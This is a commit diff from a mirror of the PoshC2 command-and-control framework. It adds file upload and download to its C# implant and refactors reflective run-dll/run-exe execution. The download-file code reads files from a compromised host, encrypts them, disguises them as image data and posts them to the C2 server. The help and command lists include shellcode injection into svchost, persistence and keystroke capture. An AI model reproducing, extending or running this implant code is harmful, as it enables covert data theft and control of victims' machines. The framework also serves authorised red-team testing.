infosecn1nja
/
PoshC2_Python
mirror of https://github.com/infosecn1nja/PoshC2_Python.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Added upload-file & download-file to C# Implant

chunking
benpturner 2018-12-31 17:22:58 +00:00
parent 0b6a31a035
commit a576952f47
3 changed files with 96 additions and 54 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

121
Files/Sharp.cs
View File

@ -102,28 +102,33 @@ public class Program
}
static string Encryption(string key, string un, bool comp = false)
static string Encryption(string key, string un, bool comp = false, byte[] unByte = null)
{
var b = System.Text.Encoding.UTF8.GetBytes(un);
byte[] byEnc = b;
if (comp){
byEnc = Compress(b);
}
try {
var a = CAMR(key, null);
var e = a.CreateEncryptor();
var f = e.TransformFinalBlock(byEnc, 0, byEnc.Length);
byte[] p = null;
p = Combine(a.IV, f);
return System.Convert.ToBase64String(p);
} catch {
var a = CAMA(key, null);
var e = a.CreateEncryptor();
var f = e.TransformFinalBlock(byEnc, 0, byEnc.Length);
byte[] p = null;
p = Combine(a.IV, f);
return System.Convert.ToBase64String(p);
}
byte[] b = null;
if (unByte != null) {
b = unByte;
} else {
b = System.Text.Encoding.UTF8.GetBytes(un);
}
byte[] byEnc = b;
if (comp){
byEnc = Compress(b);
}
try {
var a = CAMR(key, null);
var e = a.CreateEncryptor();
var f = e.TransformFinalBlock(byEnc, 0, byEnc.Length);
byte[] p = null;
p = Combine(a.IV, f);
return System.Convert.ToBase64String(p);
} catch {
var a = CAMA(key, null);
var e = a.CreateEncryptor();
var f = e.TransformFinalBlock(byEnc, 0, byEnc.Length);
byte[] p = null;
p = Combine(a.IV, f);
return System.Convert.ToBase64String(p);
}
}
static System.Security.Cryptography.AesCryptoServiceProvider CAMA(string key,string IV)
@ -328,7 +333,6 @@ public class Program
foreach (string c in split)
{
output = "";
//add download-file
//add upload-file
if (c.ToLower().StartsWith("loadmodule")){
@ -336,6 +340,28 @@ public class Program
Assembly assembly = System.Reflection.Assembly.Load(System.Convert.FromBase64String(module));
output += "Module loaded sucessfully";
}
if (c.ToLower().StartsWith("upload-file")){
string path = Regex.Replace(c, "upload-file", "", RegexOptions.IgnoreCase);
string[] splitargs = path.Split(new string[] {";"}, StringSplitOptions.RemoveEmptyEntries);
Console.WriteLine("Uploaded file to: " + splitargs[1]);
byte[] fileBytes = Convert.FromBase64String(splitargs[0]);
System.IO.File.WriteAllBytes(splitargs[1].Replace("\"", ""), fileBytes);
}
if (c.ToLower().StartsWith("download-file")){
string path = Regex.Replace(c, "download-file ", "", RegexOptions.IgnoreCase);
byte[] file = File.ReadAllBytes(path.Replace("\"", ""));
byte[] fileChuck = Combine(Encoding.ASCII.GetBytes("0000100001"), file);
URL = stringnewURLS[rnd.Next(stringnewURLS.Length)];
G = (Guid.NewGuid()).ToString();
URL = baseURL+"/"+URL+G+"/?"+RandomURI;
string dtask = Encryption(Key, c);
string dcoutput = Encryption(Key, "", true, fileChuck);
byte[] doutputBytes = System.Convert.FromBase64String(dcoutput);
byte[] dsendBytes = GetImgData(doutputBytes, stringnewIMGS);
GetWebRequest(dtask).UploadData(URL, dsendBytes);
}
if (c.ToLower().StartsWith("listmodules")){
var appd = AppDomain.CurrentDomain.GetAssemblies();
@ -351,10 +377,11 @@ public class Program
sc = sc.Replace("\"", "");
scode = sc;
}
if (c.ToLower().StartsWith("run-exe")){
if (c.ToLower().StartsWith("run-dll") || c.ToLower().StartsWith("run-exe")){
string[] splitargs = c.Split(new string[] {" "}, StringSplitOptions.RemoveEmptyEntries);
int i = 0;
string method = "";
string splittheseargs = "";
string qualifiedname = "";
string name = "";
@ -365,8 +392,17 @@ public class Program
if (i == 2){
name = a;
}
if (i > 2){
splittheseargs = splittheseargs + " " + a;
if (c.ToLower().StartsWith("run-exe")) {
if (i > 2){
splittheseargs = splittheseargs + " " + a;
}
} else {
if (i == 3){
method = a;
}
if (i > 3){
splittheseargs = splittheseargs + " " + a;
}
}
i ++;
}
@ -376,7 +412,7 @@ public class Program
foreach (var arg in splitnewargs) {
myList.Add(arg);
}
var AppDomainAss = AppDomain.CurrentDomain.GetAssemblies();
foreach (var Ass in AppDomainAss)
{
@ -384,33 +420,14 @@ public class Program
{
var loadedType = LoadSomething(qualifiedname + ", " + Ass.FullName);
try {
if (c.ToLower().StartsWith("run-exe")) {
var xxx = loadedType.Assembly.EntryPoint.Invoke(null, new object[] { myList.ToArray() });
output = xxx.ToString();
} catch { }
}
}
}
if (c.ToLower().StartsWith("run-dll")){
string[] splitargs = c.Split(new string[] {" "}, StringSplitOptions.RemoveEmptyEntries);
string qualifiedname = splitargs[1];
string name = splitargs[2];
string method = splitargs[3];
var AppDomainAss = AppDomain.CurrentDomain.GetAssemblies();
foreach (var Ass in AppDomainAss)
{
if (Ass.FullName.ToString().ToLower().StartsWith(name.ToLower()))
{
var stringOutput = new StringWriter();
Console.SetOut(stringOutput);
var loadedType = LoadSomething(qualifiedname + ", " + Ass.FullName);
try {
var xxx = loadedType.Assembly.GetType(qualifiedname).InvokeMember(method, BindingFlags.InvokeMethod, null, null, null);
output = xxx.ToString() + stringOutput.ToString();
} catch (Exception e) {
var xxx = e;
output = xxx.ToString() + stringOutput.ToString();
}
} else {
var xxx = loadedType.Assembly.GetType(qualifiedname).InvokeMember(method, BindingFlags.Public | BindingFlags.InvokeMethod | BindingFlags.Static, null, null, new object[] { myList.ToArray() });
output = xxx.ToString();
}
} catch { }
}
}
}

4
Help.py
View File

@ -62,6 +62,8 @@ run-dll Seatbelt.Program Seatbelt UserChecks
start-process net -argumentlist users
inject-shellcode c:\\windows\\system32\\svchost.exe <optional-ppid-spoofid>
inject-shellcode 1453 <optional-ppid-spoofid>
download-file "c:\\temp\\test.exe"
upload-file -source /tmp/test.exe -destination "c:\\temp\\test.exe"
kill-implant
hide-implant
unhide-implant
@ -403,4 +405,4 @@ COMMANDS += ['invoke-psexecdaisypayload','invoke-wmidaisypayload', 'invoke-dcomd
UXCOMMANDS = ["unhide-implant","hide-implant","help","searchhelp","python","loadmodule","loadmoduleforce","get-keystrokes","back","upload-file","download-file","install-persistence","remove-persistence","sai","startanotherimplant-keepfile","get-screenshot","startanotherimplant","pwd","id","ps","setbeacon","kill-implant"]
SHARPCOMMANDS = ["get-content","ls-recurse","turtle","cred-popper","resolveip","resolvednsname","testadcredential","testlocalcredential","get-screenshot","modulesloaded","get-serviceperms","unhide-implant","arpscan","ls","pwd","dir","inject-shellcode","start-process","run-exe","run-dll","hide-implant","help","searchhelp","listmodules","loadmodule","loadmoduleforce","back","ps","beacon","setbeacon","kill-implant"]
SHARPCOMMANDS = ["upload-file","download-file","get-content","ls-recurse","turtle","cred-popper","resolveip","resolvednsname","testadcredential","testlocalcredential","get-screenshot","modulesloaded","get-serviceperms","unhide-implant","arpscan","ls","pwd","dir","inject-shellcode","start-process","run-exe","run-dll","hide-implant","help","searchhelp","listmodules","loadmodule","loadmoduleforce","back","ps","beacon","setbeacon","kill-implant"]

25
ImplantHandler.py
View File

@ -506,7 +506,30 @@ def runcommand(command, randomuri):
for line in helpfull:
if searchterm in line:
print (line)
elif "upload-file" in command.lower():
source = ""
destination = ""
s = ""
args = argp(command)
try:
if args:
with open(args.source, "rb") as source_file:
s = source_file.read()
source = base64.b64encode(s)
if s:
destination = args.destination.replace("\\","\\\\")
print ("")
print ("Uploading %s to %s" % (args.source, destination))
if (args.nothidden):
uploadcommand = "upload-file%s;\"%s\"" % (source, destination)
else:
uploadcommand = "upload-file%s;\"%s\"" % (source, destination)
new_task(uploadcommand, randomuri)
except Exception as e:
print ("Error with source file: %s" % e)
traceback.print_exc()
elif "unhide-implant" in command.lower():
unhide_implant(randomuri)